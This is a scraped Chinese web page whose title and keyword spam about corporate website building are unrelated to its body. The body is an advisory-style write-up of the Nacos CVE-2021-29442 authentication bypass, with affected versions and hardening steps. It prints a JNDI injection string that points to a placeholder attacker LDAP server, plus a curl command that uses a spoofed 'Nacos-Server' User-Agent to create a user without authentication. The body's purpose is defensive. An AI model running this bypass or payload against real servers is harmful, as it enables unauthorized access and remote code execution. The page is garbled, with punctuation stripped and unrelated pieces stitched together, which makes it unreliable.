企业官网建设流程全解析

厦门百城建设有限公司网站,小程序源码是什么,建筑公司网站设计,全屏企业网站CVE-2021-29442 是 Nacos 中一个认证绕过 远程代码执行#xff08;RCE#xff09; 的高危漏洞#xff0c;主要影响 Nacos 1.4.1 及以下版本#xff0c;漏洞的核心原因是#xff1a; Nacos 默认的鉴权实现存在逻辑缺陷#xff0c;攻击者可以通过构造特殊的 HTTP 请求头绕…CVE-2021-29442 是 Nacos 中一个认证绕过 远程代码执行RCE的高危漏洞主要影响 Nacos 1.4.1 及以下版本漏洞的核心原因是Nacos 默认的鉴权实现存在逻辑缺陷攻击者可以通过构造特殊的 HTTP 请求头绕过身份认证结合 Nacos 的配置管理功能攻击者可上传恶意配置文件最终实现远程代码执行控制服务器。受影响版本Nacos 0.2.0 ~ 1.4.1不受影响版本Nacos 1.4.2 及以上、2.0.0 及以上官方已修复漏洞触发条件Nacos 开启了鉴权功能nacos.core.auth.enabledtrue但未正确配置自定义密钥默认密钥可被利用。认证绕过Nacos 的鉴权逻辑依赖User-Agent等请求头验证攻击者构造包含Nacos-Server的User-Agent即可绕过认证配置注入绕过认证后攻击者通过 Nacos 的配置发布接口上传包含恶意脚本的配置如${jndi:ldap://攻击者服务器/恶意类}代码执行当客户端拉取该恶意配置时触发 JNDI 注入执行攻击者预设的恶意代码。1.x 版本升级至1.4.2及以上2.x 版本使用2.0.0及以上2.x 架构重构从根本上修复了该漏洞。修改默认密钥在nacos/conf/application.properties中配置自定义的鉴权密钥避免使用默认值E:\Document_Nacos\nacos-server-1.4.5\nacos\conf# 开启鉴权nacos.core.auth.enabledtrue# 配置自定义密钥必须修改随机字符串nacos.core.auth.plugin.nacos.token.secret.key自定义的32位以上随机字符串# 关闭 User-Agent 白名单关键nacos.core.auth.enable.userAgentAuthWhitefalse測試curl -X POST http://nacos服务器IP:8848/nacos/v1/auth/users?usernametestpasswordtest \ -H User-Agent: Nacos-Server \ -H Content-Type: application/x-www-form-urlencodedCVE-2021-29442 是 Nacos 1.4.1 及以下版本的高危 RCE 漏洞核心是认证绕过 JNDI 注入最根本的修复方式是升级 Nacos 到 1.4.2/2.0.0 及以上版本临时防护需修改鉴权密钥、关闭 User-Agent 白名单并做好网络隔离禁止 Nacos 端口公网暴露最早之前的springcloud是用的Eureka的后来某里发展出来的一堆的抄着用。nacos其他开源国内git项目漏洞这些都是等保过不去的都是会被测试工具扫描出来要通报批评的kkFileView SSRF